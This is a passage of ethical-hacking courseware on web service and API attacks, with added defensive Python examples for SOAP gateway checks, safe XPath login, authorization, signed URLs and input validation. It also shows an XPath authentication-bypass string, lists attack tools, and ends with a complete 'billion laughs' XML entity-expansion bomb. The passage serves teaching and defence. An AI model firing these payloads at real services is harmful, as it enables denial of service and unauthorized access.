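Both attacks above succeed because a gateway trusts header values that the body or an allowlist could have contradicted. The following is an added example, not code from the courseware or from WS-Attacker: gateway-side validation that (1) refuses any request whose SOAPAction does not name the operation actually present in the SOAP body, (2) forwards only allowlisted operations, and (3) rejects WS-Addressing ReplyTo/FaultTo addresses outside an allowlist of callback hosts. The operation allowlist, the callback allowlist, the hostnames and the sample envelopes are constructed for the example; the WS-Addressing namespace URI is the real one.

```python
"""Gateway-side checks against SOAPAction and WS-Addressing spoofing.

Added example (not from the courseware or WS-Attacker). Assumes a gateway
that sees the raw SOAPAction header and the SOAP envelope before forwarding.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Operations the gateway may forward to the backend (constructed for the
# example; privileged operations such as deleteAllUsers are simply absent).
ALLOWED_OPERATIONS = {"createUser", "getUser"}

# Hosts permitted to receive asynchronous replies or faults (constructed).
CALLBACK_ALLOWLIST = {"client.example.internal"}

# WS-Addressing 1.0 namespace; the envelopes in the text are namespace-less,
# so lookups below compare local tag names only.
WSA_NS = "http://www.w3.org/2005/08/addressing"


def _local(tag):
    """Local part of a possibly namespace-qualified tag like '{ns}Address'."""
    return tag.rsplit("}", 1)[-1]


def body_operation(envelope_xml):
    """Name of the first child element of <Body>, or None if the body is empty."""
    root = ET.fromstring(envelope_xml)
    for child in root:
        if _local(child.tag) == "Body":
            for op in child:
                return _local(op.tag)
    return None


def callback_addresses(envelope_xml):
    """All ReplyTo/FaultTo Address values found in the SOAP header."""
    root = ET.fromstring(envelope_xml)
    found = []
    for child in root:
        if _local(child.tag) != "Header":
            continue
        for hdr in child:
            if _local(hdr.tag) in ("ReplyTo", "FaultTo"):
                for node in hdr.iter():
                    if _local(node.tag) == "Address" and node.text:
                        found.append(node.text.strip())
    return found


def check_request(soap_action, envelope_xml):
    """Return (ok, reason); ok is True only when every invariant holds."""
    action = soap_action.strip().strip('"')
    op = body_operation(envelope_xml)
    if op is None:
        return False, "empty SOAP body"
    if action != op:
        return False, f"SOAPAction {action!r} does not match body operation {op!r}"
    if op not in ALLOWED_OPERATIONS:
        return False, f"operation {op!r} is not permitted through the gateway"
    for addr in callback_addresses(envelope_xml):
        if urlparse(addr).hostname not in CALLBACK_ALLOWLIST:
            return False, f"callback endpoint {addr!r} is not allowlisted"
    return True, "ok"


# Constructed sample messages (the first mirrors the createUser request above).
CREATE_USER = """<Envelope><Header/><Body><createUser>
<login>rinnimathews</login><pwd>password</pwd></createUser></Body></Envelope>"""

SPOOFED_REPLYTO = f"""<Envelope xmlns:wsa="{WSA_NS}"><Header>
<wsa:ReplyTo><wsa:Address>http://victim.example.net/sink</wsa:Address></wsa:ReplyTo>
</Header><Body><getUser><login>rinnimathews</login></getUser></Body></Envelope>"""

if __name__ == "__main__":
    print(check_request('"createUser"', CREATE_USER))       # accepted
    print(check_request('"deleteAllUsers"', CREATE_USER))   # rejected: header/body mismatch
    print(check_request('"getUser"', SPOOFED_REPLYTO))      # rejected: foreign ReplyTo
```

The mismatch check alone defeats the spoof shown in the text; the allowlist is what turns the routing choice the requester makes in ReplyTo/FaultTo back into a server-side decision.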

Web Service Attacks: XML Injection
Web applications sometimes use XML to store data such as user credentials in XML documents; attackers can parse and view such data using XPATH. XPATH defines the flow of the document and verifies user credentials, such as the username and password, to redirect them to a specific user account. Attackers identify the XPATH and insert an XML injection or XML schema to bypass the authentication process and gain unrestricted access to the data stored in XML. The process by which attackers enter values that take advantage of an XML query is an XML injection attack.
Attackers inject XML data and tags into user input fields to manipulate the XML schema or populate XML databases with bogus entries. XML injection can be used to bypass authorization, escalate privileges, and generate web services DoS attacks.
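The passage describes credentials held in an XML document and an XPATH query assembled from the login form. The following added example (not from the courseware) shows the vulnerable query construction as a string, a detection helper for query-altering characters, and an authentication routine that keeps user input out of the query entirely. The users.xml layout, the accounts and the passwords are constructed.

```python
"""XML/XPath injection against credentials stored in XML.

Added example (not from the courseware). USERS_XML, the accounts and the
passwords are constructed for illustration only.
"""
import hmac
import xml.etree.ElementTree as ET

USERS_XML = """<users>
  <user><login>rinnimathews</login><pwd>password</pwd><role>user</role></user>
  <user><login>admin</login><pwd>s3cret</pwd><role>admin</role></user>
</users>"""


def build_xpath_unsafe(login, pwd):
    """The pattern the text warns about: form input spliced into the XPath.

    With login = "' or 1=1 or 'a'='a" the predicate becomes
    login='' or 1=1 or ('a'='a' and pwd='...'), which is true for every
    <user> node, so the password is never actually tested.
    """
    return f"//user[login='{login}' and pwd='{pwd}']"


def has_xpath_metacharacters(value):
    """Detection helper: flag input that could change query structure."""
    return any(ch in value for ch in "'\"[]()/=") or " or " in value.lower()


def authenticate_safe(users_xml, login, pwd):
    """Fixed query, values compared as data; returns the role or None.

    The XPath text never contains user input, so no quoting trick can alter
    which nodes are selected; the comparisons are constant-time.
    """
    root = ET.fromstring(users_xml)
    for user in root.findall("./user"):
        stored_login = user.findtext("login", "").encode()
        stored_pwd = user.findtext("pwd", "").encode()
        if (hmac.compare_digest(stored_login, login.encode())
                and hmac.compare_digest(stored_pwd, pwd.encode())):
            return user.findtext("role")
    return None


if __name__ == "__main__":
    injected = "' or 1=1 or 'a'='a"
    print(build_xpath_unsafe(injected, "x"))
    print(has_xpath_metacharacters(injected))                 # True
    print(authenticate_safe(USERS_XML, "admin", "s3cret"))    # admin
    print(authenticate_safe(USERS_XML, injected, "x"))        # None
```

Storing passwords in clear text inside the XML, as the scenario assumes, remains a weakness of its own; the example only shows that the lookup itself can be made immune to query injection.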

Web Services Parsing Attacks
Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a DoS attack or generate logical errors in web service request processing. A parsing attack is performed when an attacker succeeds in modifying a file request or string. The attacker changes the values by superimposing one or more operating system commands via the request. Parsing is possible when the attacker executes .bat (batch) or .cmd (command) files.
▪ Recursive Payloads
The attacker queries for web services with a grammatically correct SOAP document that contains infinite processing loops, resulting in exhaustion of the XML parser and CPU.
▪ Oversize Payloads
Attackers send a payload that is excessively large to consume all the system resources, rendering web services inaccessible to other legitimate users.

Web Service Attack Tools
▪ SoapUI Pro
Source: https://www.soapui.org
SoapUI Pro is a web service testing tool that supports multiple protocols such as SOAP, REST, HTTP, JMS, AMF, and JDBC. An attacker can use this tool to carry out web service probing, SOAP injection, XML injection, and web service parsing attacks.

Figure 14.83: Screenshot of SoapUI Pro

▪ XMLSpy
Source: https://www.altova.com
Altova XMLSpy is an XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies.

Figure 14.84: Screenshot of XMLSpy
Additional Web Application Hacking Tools
Besides the web application hacking tools described above, several other tools can help attackers accomplish their goals. Some additional web application hacking tools are listed below:
▪ Metasploit (https://www.metasploit.com)
▪ w3af (http://w3af.org)
▪ Nikto (https://cirt.net)
▪ Sniper (https://github.com)
▪ WSSiP (https://github.com)
▪ X Attacker (https://github.com)
▪ timing_attack (https://github.com)
▪ HTTrack (http://www.httrack.com)
▪ SQL Injection Scanner (https://pentest-tools.com)
▪ XSS Scanner (https://pentest-tools.com)
▪ SQL Exploiter (https://pentest-tools.com)
▪ HTTP Request Logger (https://pentest-tools.com)
▪ WebCopier (http://www.maximumsoft.com)
▪ WPScan (https://wpscan.org)
▪ Instant Source (https://www.blazingtools.com)
Module Flow
[Module flow: Web Application Concepts; Web Application Threats; Web API, Webhooks, and Web Shell; Web Application Security]

Web API, Webhooks, and Web Shell
Recent years have witnessed an exponential increase in the usage of web APIs in application development. Web APIs help developers in building web applications that retrieve data from multiple online sources. As web APIs are incorporated in many popular applications such as social networking, shopping, and search engines, the importance of securing APIs and their integrity has increased. Any security breach in an API can expose personal or business-critical data to attackers. This section discusses the basic concepts of web API, webhooks, and web shell; API vulnerabilities and hacking techniques; and the best practices for API security.
What is Web API?
Web API is an application programming interface that provides online web services to client-side applications for retrieving and updating data from multiple online sources. It is a special type of interface where interactions between applications can be allowed through the Internet and some web-based protocols. Web APIs make resources accessible on the Internet, and they are generally accessed via the HTTP protocol. They also consist of different types of tools, functions, and protocols that can be used to develop software or applications without any complexity.
For example, consider a traditional web application that is supported by multiple mobile platforms with no centralized API. This results in the complexity of updating business logic for each individual implementation whenever there is an update in the client applications. Using a centralized web API reduces the complexity and increases the integrity of updating and changing the data or business logic at one central location.

Figure 14.85: Illustration of Web API
Web Service APIs
The most frequently used web service APIs are listed below:
▪ SOAP API: SOAP is a web-based communication protocol that enables interactions between applications running on different platforms such as Windows, macOS, Linux, etc., via XML and HTTP. SOAP-based APIs are programmed to generate, recover, modify, and erase different logs such as profiles, credentials, and business leads.
▪ REST (Representational State Transfer) API: REST is not a specification, tool, or framework; it is an architectural style of web service that serves as a communication medium between various systems on the web. APIs supported by the REST architectural style are known as REST APIs. Such API-based computer systems, web services, and database systems allow requesting machines to receive prompt access and redefine web resource representations by providing a set of stateless protocols and qualitative operations.
▪ RESTful API: RESTful API is a RESTful service that is designed using REST principles and HTTP communication protocols. RESTful is a collection of resources that use HTTP methods such as PUT, POST, GET, and DELETE. RESTful API is also designed to make applications independent to improve the overall performance, visibility, scalability, reliability, and portability of an application.
APIs with the following features can be referred to as RESTful APIs:
  o Stateless: The client end stores the state of the session; the server is restricted to save data during the request processing
  o Cacheable: The client should save responses (representations) in the cache. This feature can enhance API performance
  o Client-server Environment: Both the client and the server should be independent of each other because the server handles backend operations and the client is the front end from where requests are made
  o Uniform Interface: Resources must be specifically and independently recognized via a single URL by employing basic protocol methods such as PUT, POST, GET, and DELETE, and it should be possible to modify a resource
  o Layered System: Multiple-layer architecture allows intermediary servers to supply shared memory (cache) to achieve scalability because the client system never directly notifies the main server of its connectivity
  o Code on Demand: An optional feature where the server can also provide executable code to the client, through which the client's temporary functionality can be customized
▪ XML-RPC: Extensible Markup Language Remote Procedure Call (XML-RPC) is a communication protocol that uses a specific XML format to transfer data, whereas SOAP uses proprietary XML to transfer data. It is simpler than SOAP and uses less bandwidth to transfer data.
▪ JSON-RPC: JavaScript Object Notation Remote Procedure Call (JSON-RPC) is a communication protocol that serves in the same way as XML-RPC but uses the JSON format instead of XML to transfer data.
What are Webhooks?
Webhooks are user-defined HTTP callback or push APIs that are raised based on events triggered, such as a comment received on a post and pushing code to the registry. A webhook allows an application to update other applications with the latest information. Once invoked, it supplies data to the other applications, which means that users instantly receive real-time information. Webhooks are sometimes called "Reverse APIs" as they provide what is required for API specification, and the developer should create an API to use a webhook.
A webhook is an API concept that is also used to send text messages and notifications to mobile numbers or email addresses from an application when a specific event is triggered. For instance, if you search for something in the online store and the required item is out of stock, you click on the "Notify me" bar to get an alert from the application when that item is available for purchase. These notifications from the applications are usually sent through webhooks.
Operation of Webhooks
Webhooks are enrolled along with the domain registration via the user interface or API to inform the clients about a new event occurrence. The generated path contains the required code that automatically executes on the new event occurrence. Here, systems need not know what should be run; they just need to trace the path to generate notifications.
A webhook is a powerful tool because everything remains isolated on the web. As shown in the figure below, when system-2 gets a notification message from the selected path of the domain, it not only becomes aware of new event occurrences on other machines but also responds to them. The path contains the code that can be accessed via an HTTP POST request. It also informs the user about from where the message has been triggered, including its date and time and other details related to the event. Webhooks can be private or public.

[Figure: System-1 delivers a webhook over HTTP to System-2]
Figure 14.86: Operation of webhooks

Webhooks vs. APIs
▪ Webhooks are automated messages from websites to the server. APIs are used for server-to-website communication.
▪ Webhooks only get reports or notifications via HTTP POST when a new update is made. APIs make calls irrespective of the data updates.
▪ Webhooks update applications or services with real-time information. API needs additional implementations to perform this activity.
▪ Webhooks have less control over data flow. APIs have easy control over data flow.
OWASP Top 10 API Security Risks
Source: https://www.owasp.org
According to OWASP, the following are the top 10 API security risks:

API Risks and Description
Broken Object Level Authorization:
  APIs expose the endpoints handling object identifiers, and the server component does not track the client's state properly, resulting in a massive attack surface level access control flaw.
  Allows the attacker to modify the object's ID value and obtain unauthorized access to the data source.
Broken User Authentication:
  Vulnerabilities in authentication mechanisms allow attackers to compromise the API security using authentication tokens and exploiting implementation flaws.
  Attackers can easily capture authentication tokens and steal user identities. APIs are vulnerable to authentication attacks such as credential stuffing and brute-forcing.
Excessive Data Exposure:
  While designing the API, the developers may expose all the object properties to the clients without considering their individual sensitivity and depend on the clients for filtering data.
  Allows attackers to retrieve more information than requested.
Lack of Resources and Rate Limiting:
  APIs avoid enforcing restrictions on the number of resources requested by the client.
  Allows attackers to consume all the available resources, resulting in service unavailability to legitimate users, causing DoS. May include authentication flaws that can be exploited to perform brute-force attacks.
Broken Function Level Authorization:
  Complexity in access control policies through different hierarchies, groups, and roles between administrative and regular functions can cause authorization errors.
  Allows attackers to gain unauthorized access to administrative functions or users' resources.
Mass Assignment:
  APIs accidentally expose the internal variables or objects due to improper binding and filtering based on a whitelist.
  Allows attackers to modify properties with unauthorized access to the object.
Security Misconfiguration:
  Security misconfigurations include vulnerabilities such as insecure default configurations, ad-hoc configurations, open cloud storage, misconfigured HTTP headers, permissive cross-origin resource sharing (CORS), and missing TLS/SSL.
  Allows attackers to perform various attacks and compromise the system security.
Injection:
  Sending untrusted data as queries to the interpreter may result in injection flaws, such as SQL, LDAP, XML, and command injection.
  Allows attackers to trick the interpreter by sending data to execute malicious commands and gain unauthorized access.
Improper Assets Management:
  Improper asset management occurs due to a lack of version control for older versions of API hierarchies, and consists of vulnerabilities that can be exploited by the attacker.
Insufficient Logging and Monitoring:
  Lack of proper logging and monitoring along with missing or ineffective integration with incident response can make the system vulnerable.
  Allows attackers to compromise the system, maintain persistence, and pivot to other systems and networks to extract, tamper with, or destroy data.

Table 14.3: OWASP Top 10 API Security Risks
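Two rows of the table, Broken Object Level Authorization and Mass Assignment, come down to two missing lines of code in a typical update handler. The following added example (not from the courseware or from OWASP) models a PATCH /accounts/{id} handler in plain Python: the vulnerable version trusts the object ID from the URL and binds every body key onto the record; the hardened version checks that the caller owns the object and binds only an allowlist of writable fields. The account table, the callers and the request bodies are constructed.

```python
"""Broken Object Level Authorization and Mass Assignment, side by side.

Added example (not from the courseware or OWASP). The store, callers and
request bodies are constructed; handlers return (http_status, payload).
"""

# Fields a client may change on its own account. Everything else (owner,
# role, balance) is server-controlled and must never be bound from a body.
WRITABLE_FIELDS = {"email", "display_name"}


def make_store():
    """Constructed account table: account id -> record."""
    return {
        "1001": {"owner": "alice", "email": "alice@example.com", "role": "user", "balance": 50},
        "1002": {"owner": "bob", "email": "bob@example.com", "role": "user", "balance": 75},
    }


def update_account_vulnerable(store, caller, account_id, body):
    """PATCH /accounts/{id} with neither check.

    `caller` is the authenticated principal but is never consulted, so bob
    can address alice's id (Broken Object Level Authorization), and
    record.update(body) lets the body set role or balance (Mass Assignment).
    """
    record = store[account_id]
    record.update(body)
    return 200, record


def update_account_hardened(store, caller, account_id, body):
    """Same endpoint with an ownership check and a field allowlist.

    404 is returned both for "no such account" and "not the caller's
    account" so that probing ids does not reveal which ones exist.
    """
    record = store.get(account_id)
    if record is None or record["owner"] != caller:
        return 404, {"error": "not found"}
    rejected = sorted(k for k in body if k not in WRITABLE_FIELDS)
    if rejected:
        return 400, {"error": "fields not writable", "fields": rejected}
    record.update(body)
    return 200, record


if __name__ == "__main__":
    store = make_store()
    print(update_account_vulnerable(store, "bob", "1001", {"role": "admin"}))  # alice is now admin
    store = make_store()
    print(update_account_hardened(store, "bob", "1001", {"email": "x@example.com"}))  # 404
    print(update_account_hardened(store, "alice", "1001", {"role": "admin"}))         # 400
    print(update_account_hardened(store, "alice", "1001", {"email": "a2@example.com"}))  # 200
```

Rejecting unknown fields with 400 rather than silently dropping them is deliberate: a client that sends `role` is either buggy or probing, and either case is worth a log entry.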
API Vulnerabilities
Modern web applications and SaaS platforms use APIs due to their extensive features, and most of the API security mainly focuses on technical aspects. Poor management of API permissions, flaws in business logic, and exposure of application logic and sensitive data such as personally identifiable information (PII) drastically increase the attack surface and pave the way for attackers to target these vulnerabilities to perform many attacks such as DoS and code injection attack.
Some common API vulnerabilities are listed below:

Vulnerabilities and Description
Enumerated Resources:
  Design flaws can cause serious vulnerability, disclosing information through the public unauthenticated API.
  Allows attackers to guess user IDs easily, compromising security of the user data.
Sharing Resources via Unsigned URLs:
  API returns URLs to hypermedia resources such as image, audio, or video files that are vulnerable to hotlinking.
  This can cause several problems such as poor analytics and strains on resources, and can be used by attackers for exploitation.
  Signed URLs can be used to implement policies such as rate limiting, auto expiration, and scoped sharing.
Vulnerabilities in Third-Party Libraries:
  Developers use third-party open-source software libraries having software licenses.
  Avoiding regular updates and relegating security fixes can result in many security flaws.
Improper Use of CORS:
  Cross-origin resource sharing (CORS) is a mechanism that enables the web browser to perform cross-domain requests; improper implementations of CORS can cause unintentional flaws.
  Using the "Access-Control-Allow-Origin" header for allowing all origins on private APIs can lead to hotlinking.
Code Injections:
  If the input is not sanitized, attackers may use code injection techniques such as SQLi and XSS to add malicious SQL statements or code to the input fields on the API.
  Allows attackers to steal critical information such as session cookies and user credentials.
RBAC Privilege Escalation:
  Privilege escalation is a common vulnerability present in APIs having role-based access control (RBAC) where changes to endpoints are made without proper attention.
  Allows attackers to gain access to users' sensitive information.
No ABAC Validation:
  No proper attribute-based access control (ABAC) validation allows attackers to gain unauthorized access to API objects or perform actions such as viewing, updating, or deleting.
Business Logic Flaws:
  Many APIs come with vulnerabilities in business logic.
  Allows attackers to exploit legitimate workflows for malicious purposes.

Table 14.4: API vulnerabilities
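The table names signed URLs as the counter-measure for "Sharing Resources via Unsigned URLs", with auto expiration and scoped sharing as the policies they carry. The following added example (not from the courseware) shows one way to build them: the API issues a URL carrying an expiry time, the principal it was issued to, and an HMAC over path, expiry and principal; the media server recomputes the HMAC and refuses anything tampered, expired, or presented by a different principal. The signing key, the hostname, the paths and the user names are constructed.

```python
"""Signed, expiring, scoped URLs for hypermedia resources.

Added example (not from the courseware). SIGNING_KEY, the media hostname,
paths and principals are constructed; `now` is passed in so the logic is
testable without a clock.
"""
import hashlib
import hmac
from urllib.parse import parse_qs, urlencode, urlparse

SIGNING_KEY = b"constructed-demo-key-rotate-me"  # constructed; load from a secret store in practice
MEDIA_HOST = "https://media.example.com"         # constructed
DEFAULT_TTL = 300                                # seconds a link stays valid


def _mac(path, expires, scope):
    """HMAC-SHA256 over the fields the server must be able to trust."""
    msg = f"{path}\n{expires}\n{scope}".encode()
    return hmac.new(SIGNING_KEY, msg, hashlib.sha256).hexdigest()


def sign_url(path, scope, now, ttl=DEFAULT_TTL):
    """Issue a URL for `path` to principal `scope`, valid for `ttl` seconds."""
    expires = int(now) + ttl
    query = urlencode({"exp": expires, "scope": scope, "sig": _mac(path, expires, scope)})
    return f"{MEDIA_HOST}{path}?{query}"


def verify_url(url, scope, now):
    """Return (ok, reason). `scope` is the principal presenting the link."""
    parsed = urlparse(url)
    q = parse_qs(parsed.query)
    try:
        expires = int(q["exp"][0])
        url_scope = q["scope"][0]
        sig = q["sig"][0]
    except (KeyError, ValueError):
        return False, "missing or malformed signature parameters"
    if url_scope != scope:
        return False, "URL was issued to a different principal"
    if now > expires:
        return False, "URL expired"
    # Recompute over the path actually requested, so a changed path fails too.
    if not hmac.compare_digest(sig, _mac(parsed.path, expires, url_scope)):
        return False, "bad signature"
    return True, "ok"


if __name__ == "__main__":
    t0 = 1_700_000_000
    link = sign_url("/videos/42.mp4", "alice", t0)
    print(link)
    print(verify_url(link, "alice", t0 + 10))     # (True, 'ok')
    print(verify_url(link, "alice", t0 + 400))    # expired
    print(verify_url(link, "bob", t0 + 10))       # wrong principal
```

Because every link carries its own expiry and principal, the same verifier also gives the media server a natural key for per-principal rate limiting, the third policy the table mentions.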
Web API Hacking Methodology
Recent years have witnessed tremendous growth in the usage of web-based APIs for supporting heterogeneous devices such as mobile devices and IoT devices. These devices frequently communicate with backend web servers via APIs. To make these web-based APIs more user-friendly, developers are taking shortcuts to security, making online web services vulnerable to various attacks. Attackers use various techniques to identify and exploit vulnerabilities in these APIs. To hack an API, attackers need to identify the API technologies, security standards, and attack surface for exploitation.
Hacking a web API involves the following phases:
▪ Identify the target
▪ Detect security standards
▪ Identify the attack surface
▪ Launch attacks
Identify the Target
Before hacking an API, an attacker first needs to identify the target and its perimeter:
▪ HTTP: APIs such as SOAP and REST mostly use the HTTP protocol for communicating API-based messages. The HTTP protocol is a text-based protocol where the header information is transmitted in a readable format. For example, consider the following HTTP Request and Response headers:
HTTP Request
[Figure: an example HTTP GET request showing the request line and request headers, the blank line separating header and body, and the request message body]
Figure 14.87: Example of HTTP Request header
HTTP Response
[Figure: an example HTTP response showing the status line and response headers, the blank line separating header and body, and the response message body]
Figure 14.88: Example of HTTP Response header
As shown in the figures, both HTTP Request and Response headers are transmitted in plaintext; an attacker can easily manipulate these headers to identify the target.
▪ Message Formats: The API messages transmitted over the web will take some format such as JSON for REST API and XML for SOAP API. If these formats are used incorrectly, they can pave the way for vulnerabilities. As these formats are easy to understand, an attacker can easily manipulate messages encoded in these formats to identify the target and its perimeter.
Detect Security Standards
Although APIs claim to be secure as they incorporate security standards such as OAuth and SSL, they still include many vulnerabilities that can be exploited by attackers.
▪ APIs such as SOAP and REST implement different authentication/authorization standards such as OpenID Connect, SAML, OAuth 1.X and 2.X, and WS-Security.
▪ SSL provides transport-level security for API messages to ensure confidentiality through encryption and integrity through signature. Although SSL is used for security, in most API messages, only sensitive user data such as credit card details are encrypted, leaving other information in plaintext.
If these security standards are configured improperly, an attacker can identify vulnerabilities in these standards for further exploitation. For example, an attacker can capture and reuse a session token to retrieve a legitimate user's account information that is not encrypted.
Identify the Attack Surface
After identifying the target API to attack and its security implementations, an attacker needs to identify the attack surface for launching the attack. It is very easy to find an attack surface for UI-based applications, as we can see various input fields on the web pages. However, identifying the attack surface for an API is different as there are no built-in UI fields; we can only see an API endpoint. To identify an attack surface of an API, attackers need to understand the API's endpoints, parameters, messages, and behavior.
Use the following techniques to identify the attack surface of the target API:
▪ API Metadata Vulnerabilities: API metadata reveals a large amount of technical information such as paths, parameters, and message formats, which is useful for performing an attack. REST API uses metadata formats such as Swagger, RAML, API Blueprint, and I/O Docs, while SOAP API uses WSDL/XML-Schema, etc. For example, consider the following code snippet of a Swagger definition that reveals technical information.
[Figure: Swagger definition excerpt showing a DELETE method with its summary, an oauth2 authorization entry, and a required string path parameter]
Figure 14.89: Example of Swagger definition
Attackers can exploit vulnerabilities in these definitions to perform various attacks on APIs.
▪ API Discovery: If an API does not have metadata, attackers monitor and record the communication between the API and an existing client to identify the initial attack surface. For example, an attacker may use a mobile app that uses the target API, configure a local proxy for recording traffic, and finally configure the mobile device to use this proxy to access the API. Then, the attacker uses automated tools to generate metadata from the recorded traffic.
▪ Brute Force: If none of the abovementioned techniques works, the attackers try to identify the API paths, arguments, etc., through brute-forcing. Common API paths used by developers include /api, /api/v2, /apis.json, etc. Furthermore, some APIs such as hypermedia allow retrieving links and parameters related to an API response. This information helps attackers to identify the attack surface.
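What Figure 14.89 shows is that published metadata is an inventory of the attack surface, and the same document is the quickest way for the API's own team to audit it. The following added example (not from the courseware) reads a Swagger 2.0 style document, lists every operation with its parameters, and reports the operations that declare no security requirement. The specification embedded below is constructed; only its structure (paths, methods, parameters, security) follows the Swagger 2.0 layout.

```python
"""Inventory an API's attack surface from its Swagger 2.0 metadata.

Added example (not from the courseware). SPEC_JSON is a constructed
specification; the field names follow Swagger 2.0.
"""
import json

SPEC_JSON = json.dumps({
    "swagger": "2.0",
    "basePath": "/api/v1",
    "securityDefinitions": {
        "oauth2": {"type": "oauth2", "flow": "implicit",
                   "authorizationUrl": "https://auth.example.com/oauth"},
    },
    "paths": {
        "/users/{id}": {
            "get": {"parameters": [{"name": "id", "in": "path", "type": "string", "required": True}]},
            "delete": {"summary": "Delete a user",
                       "security": [{"oauth2": ["admin"]}],
                       "parameters": [{"name": "id", "in": "path", "type": "string", "required": True}]},
        },
        "/users": {
            "get": {"parameters": [{"name": "page", "in": "query", "type": "integer"}]},
        },
        "/export": {
            "post": {"parameters": [{"name": "body", "in": "body", "schema": {"type": "object"}}]},
        },
    },
})

HTTP_METHODS = {"get", "put", "post", "delete", "patch", "head", "options"}


def inventory(spec_json):
    """One dict per operation: method, full path, parameters, and whether
    a security requirement applies (operation-level or document-level)."""
    spec = json.loads(spec_json)
    base = spec.get("basePath", "")
    ops = []
    for path, item in spec.get("paths", {}).items():
        for method, op in item.items():
            if method.lower() not in HTTP_METHODS:
                continue  # skip 'parameters' and vendor extensions at path level
            params = [(p["name"], p.get("in"), p.get("type", "schema"))
                      for p in op.get("parameters", [])]
            ops.append({
                "method": method.upper(),
                "path": base + path,
                "params": params,
                "secured": bool(op.get("security") or spec.get("security")),
            })
    return sorted(ops, key=lambda o: (o["path"], o["method"]))


def unauthenticated_operations(spec_json):
    """'METHOD /path' for every operation with no security requirement."""
    return [f'{o["method"]} {o["path"]}' for o in inventory(spec_json) if not o["secured"]]


if __name__ == "__main__":
    for op in inventory(SPEC_JSON):
        flag = "" if op["secured"] else "  <-- no security requirement"
        print(f'{op["method"]:6} {op["path"]:22} {op["params"]}{flag}')
```

In the constructed spec only the DELETE is protected; the GETs that return user objects and the POST that accepts an arbitrary object body are not, which is exactly the kind of gap the metadata hands to whoever reads it first.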
Launch Attacks
After identifying the target API, analyzing the message formats and security standards, and identifying the attack surface, attackers perform various attacks on the target API to steal sensitive information such as credit card details and credentials.
Various attacks performed on APIs are discussed below:
▪ Fuzzing
Attackers use the fuzzing technique to repeatedly send some random input to the target API to generate error messages that reveal critical information. To perform fuzzing, attackers use automated scripts that send numerous requests with varying combinations of input parameters. Attackers use tools such as Fuzzapi to perform fuzzing on the target API.
▪ Invalid Input Attacks
In some scenarios, fuzzing is difficult to perform due to its structure. In such cases, attackers will give invalid inputs to the API, such as sending text in place of numbers, sending numbers in place of text, sending a greater number of characters than expected, and sending null characters, etc., to extract sensitive information from unexpected system behavior and error messages. At the same time, attackers also manipulate the HTTP headers and values targeting both API logic and the HTTP protocol.
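Fuzzing and invalid-input attacks both work only when a wrong-typed, oversized or null-byte-laden value reaches code that fails loudly. The following added example (not from the courseware) is a server-side validator for the kind of /cust/{id} request used later in this section: every parameter is checked against a declared schema, the client always receives the same generic 400 message, and the specific reason is kept in a server-side log. The schema, the sample parameters and the log list are constructed.

```python
"""Schema-based input validation that does not leak through error messages.

Added example (not from the courseware). CUST_SCHEMA and the sample
requests are constructed; SERVER_LOG stands in for the application log.
"""

CUST_SCHEMA = {
    "custID": {"type": int, "min": 1, "max": 10**9},
    "fields": {"type": str, "max_len": 64,
               "allowed_chars": set("abcdefghijklmnopqrstuvwxyz,_")},
}

GENERIC_ERROR = {"status": 400, "error": "invalid request"}
SERVER_LOG = []


def _check_field(name, rule, value):
    """Return None when `value` satisfies `rule`, else a short reason."""
    if rule["type"] is int:
        # Canonical integers only: rejects "abc", "12abc", "1e3", floats, booleans.
        is_int = isinstance(value, int) and not isinstance(value, bool)
        is_digits = isinstance(value, str) and value.isascii() and value.isdigit()
        if not (is_int or is_digits):
            return f"{name}: not an integer"
        v = int(value)
        if not rule["min"] <= v <= rule["max"]:
            return f"{name}: out of range ({v})"
        return None
    if rule["type"] is str:
        if not isinstance(value, str):
            return f"{name}: not a string"
        if "\x00" in value:
            return f"{name}: embedded null byte"
        if len(value) > rule["max_len"]:
            return f"{name}: too long ({len(value)} chars)"
        if not set(value) <= rule["allowed_chars"]:
            return f"{name}: disallowed characters"
        return None
    return f"{name}: unknown rule type"


def validate(params, schema=CUST_SCHEMA):
    """Return (ok, response). Specific reasons go to SERVER_LOG, never to the client."""
    reasons = []
    for name, rule in schema.items():
        if name not in params:
            reasons.append(f"{name}: missing")
            continue
        reason = _check_field(name, rule, params[name])
        if reason:
            reasons.append(reason)
    for name in params:
        if name not in schema:
            reasons.append(f"{name}: unexpected parameter")
    if reasons:
        SERVER_LOG.append("; ".join(reasons))
        return False, GENERIC_ERROR
    return True, {"status": 200}


if __name__ == "__main__":
    print(validate({"custID": "459", "fields": "name,email"}))      # accepted
    print(validate({"custID": "abc", "fields": "name"}))            # generic 400
    print(validate({"custID": "459", "fields": "name\x00"}))        # generic 400
    print(validate({"custID": "459", "fields": "a" * 100}))         # generic 400
    print(SERVER_LOG)                                                # the real reasons
```

Unknown parameters are rejected rather than ignored so that a fuzzer probing for hidden parameters gets the same opaque answer as any other bad request.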
▪ Malicious Input Attacks
In the attack discussed above, attackers try to retrieve sensitive information from unexpected system behavior or error messages. A more dangerous attack is where the attackers inject malicious input directly to target both the API and its hosting infrastructure. To perform this attack, attackers employ malicious message parsers using XML. The following code snippet illustrates an XML bomb attack:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
